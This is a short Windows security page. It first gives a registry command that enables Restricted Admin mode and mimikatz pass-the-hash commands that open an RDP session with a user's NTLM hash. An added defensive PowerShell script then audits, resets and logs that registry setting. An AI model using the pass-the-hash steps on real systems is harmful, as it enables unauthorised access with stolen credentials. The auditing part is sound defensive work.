Enable Restricted Admin using PowerShell and use mimikatz for RDP

To enable Restricted Admin mode using PowerShell, run the following command:

New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD

Now you can use mimikatz as follows to open an RDP session:

token::elevate
privilege::debug
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin /v:<IP of the system>"
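
For defenders, the registry value set above is the thing to audit. The following is an added example, not part of the original page: it reports whether DisableRestrictedAdmin is 0 on the local host, sets it back to 1, and searches for recorded changes to it. The function names are hypothetical, the script must run elevated, and the change search assumes Sysmon is installed with a configuration that logs registry value sets under the Lsa key.

```powershell
# Added example: audit and harden the Restricted Admin setting on this host.
$LsaPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$ValueName = 'DisableRestrictedAdmin'

function Get-RestrictedAdminState {
    # 0       = Restricted Admin enabled (the state the command above creates)
    # 1       = Restricted Admin explicitly disabled
    # missing = value never created; reported here as not enabled
    $prop = Get-ItemProperty -Path $LsaPath -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $prop) {
        return [pscustomobject]@{
            Computer = $env:COMPUTERNAME; Value = $null; RestrictedAdminEnabled = $false
        }
    }
    [pscustomobject]@{
        Computer               = $env:COMPUTERNAME
        Value                  = $prop.$ValueName
        RestrictedAdminEnabled = ($prop.$ValueName -eq 0)
    }
}

function Disable-RestrictedAdmin {
    # Creates the value if it is missing, otherwise overwrites it with 1.
    Set-ItemProperty -Path $LsaPath -Name $ValueName -Value 1 -Type DWord
    Get-RestrictedAdminState
}

function Get-RestrictedAdminRegistryChange {
    # Assumption: Sysmon logs Event ID 13 (registry value set) for this key.
    # Returns nothing if the log is absent or holds no matching events.
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13 }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match [regex]::Escape($ValueName) } |
        Select-Object TimeCreated, Message
}

$state = Get-RestrictedAdminState
$state
if ($state.RestrictedAdminEnabled) {
    Write-Warning "$ValueName is 0 on $($state.Computer); recent changes:"
    Get-RestrictedAdminRegistryChange | Format-List
    # Uncomment to remediate once the change has been investigated:
    # Disable-RestrictedAdmin
}
```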
